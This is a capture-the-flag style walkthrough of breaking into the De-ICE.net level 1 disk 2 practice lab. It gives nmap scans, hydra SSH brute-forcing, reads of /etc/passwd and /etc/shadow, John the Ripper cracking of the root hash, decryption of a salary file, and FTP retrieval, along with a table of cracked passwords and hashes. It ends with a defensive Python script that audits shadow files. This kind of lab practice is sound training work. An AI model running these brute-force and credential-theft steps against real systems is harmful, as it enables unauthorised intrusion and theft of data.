Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3194722
Download video: http://www.mediafire.com/download.php?nt3ugmz02tw
Commands: http://pastebin.com/f7a1db54f


What is this?
This is my walkthrough of how I broke into the De-ICE.net network, level 1, disk 2.
The De-ICE.net network is on a "live PenTest CD" that creates one or more targets on which to practise penetration testing; it has an "end goal" to reach.


What do I need?

> BackTrack 4 (Final)
> de-ice.net-1.110-1.1.iso (MD5: a3341316ca9860b3a0acb06bdc58bbc1)
> Dictionary(s)


Software
Name: De-ICE.net
Version: 1.1 (Level 1 - Disk 2 - IP Address: 1.100)
Home Page: http://www.de-ice.net or http://heorot.net/livecds/
Download Link:


Forums/Support: http://forums.heorot.net and http://forums.heorot.net/viewtopic.php?f=16&t=13
WiKi/Support: http://de-ice.net/hackerpedia/index...._PenTest_Disks


Commands:
nmap -n 192.168.1.1-255

nmap -n -sS -sV -O 192.168.1.100

firefox 192.168.1.100

[+]kate -> make list of possible usernames. Save. Filename: usernames
// lastF, fLast

hydra 192.168.1.100 ssh2 -L /root/usernames -p password -e s

ssh bbanter@192.168.1.100
// Answer "yes" if asked whether to trust the host's authenticity. Password: bbanter

cd /etc/

cat passwd

[+]kate -> Update usernames. Save.

cat group

exit

cd /root/tools/dictionary/

cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords

hydra 192.168.1.100 ssh2 -V -l aadams -P /root/passwords

ssh aadams@192.168.1.100
// Password: nostradamus

cd /etc/

sudo cat shadow
// Password: nostradamus

[+]kate -> New -> Paste -> Save. Filename: shadow

exit

john

./john --rules --wordlist=/root/passwords --users=root /root/shadow
// Password: tarot

ssh aadams@192.168.1.100
// Password: nostradamus

su
// Password: tarot

ls -a

cd ..

ls -a

cd ftp/

ls -a

cd incoming/

ls -a

openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot

cd /etc/

vi vsftpd.conf
// edit (by pressing i) vsftpd.conf to have a '#' in front of 'listen=YES' (last line). Then save it (:w), and exit (:quit)

modprobe capability

exit

exit

ftp 192.168.1.100
// User: root. Password: tarot

ls -a

cd ..

ls -a

cd home

ls -a

cd ftp

ls -a

cd incoming

ls -a

get salary.csv

cd /pentest/passwords/jtr

ls

mv salary.csv ~
[+]kate -> salary.csv

// GAME OVER



----------------------------------------------------------------------------------------------------
Users
root:tarot           = root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
aadams:nostradamus   = aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:bbanter      = bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:hierophant   = ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
----------------------------------------------------------------------------------------------------
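
Added example (not part of the original post or its pastebin commands): every hash in the Users table starts with $1$, the md5crypt identifier, and no account has a real maximum password age. A defender can audit a shadow file for both conditions with the short Python script below; the function names are illustrative, and the sample input is the four lines above.

```python
from datetime import date, timedelta

# The four /etc/shadow entries from the post's "Users" table.
SHADOW = """\
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
"""

# crypt(3) scheme identifiers that appear between the first two '$' signs.
SCHEMES = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
           "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}
WEAK = {"md5crypt", "descrypt"}  # obsolete schemes, cheap to attack offline


def audit_entry(line):
    """Parse one shadow(5) line and return its hash scheme and findings."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError(f"expected 9 shadow fields, got {len(fields)}")
    user, pw, last_change, _min_age, max_age = fields[:5]
    findings = []
    if pw == "":
        scheme = "none"
        findings.append("empty password field")
    elif pw[0] in "!*":
        scheme = "locked"
    elif pw.startswith("$"):
        scheme = SCHEMES.get(pw.split("$")[1], "unknown")
    else:
        scheme = "descrypt"  # traditional crypt has no '$id$' prefix
    if scheme in WEAK:
        findings.append(f"weak hash scheme: {scheme}")
    # Empty or 99999 in the maximum-age field means the password never expires.
    if scheme not in ("locked", "none") and max_age in ("", "99999"):
        findings.append("no password expiry")
    # Field 3 is the last password change, in days since 1970-01-01.
    changed = date(1970, 1, 1) + timedelta(days=int(last_change)) if last_change else None
    return {"user": user, "scheme": scheme, "changed": changed, "findings": findings}


def audit(text):
    """Audit every non-blank line of a shadow file given as a string."""
    return [audit_entry(line) for line in text.splitlines() if line.strip()]


if __name__ == "__main__":
    for r in audit(SHADOW):
        print(r["user"], r["scheme"], r["changed"], "; ".join(r["findings"]))
```
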



Notes:

Video length: 04:11
Capture length: 08:52
Song: Eryka Badu & Ziggy Marley - I Luv U (Dubstep Mix)

Blog Post: g0tmi1k: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
Forum Post:



~g0tmi1k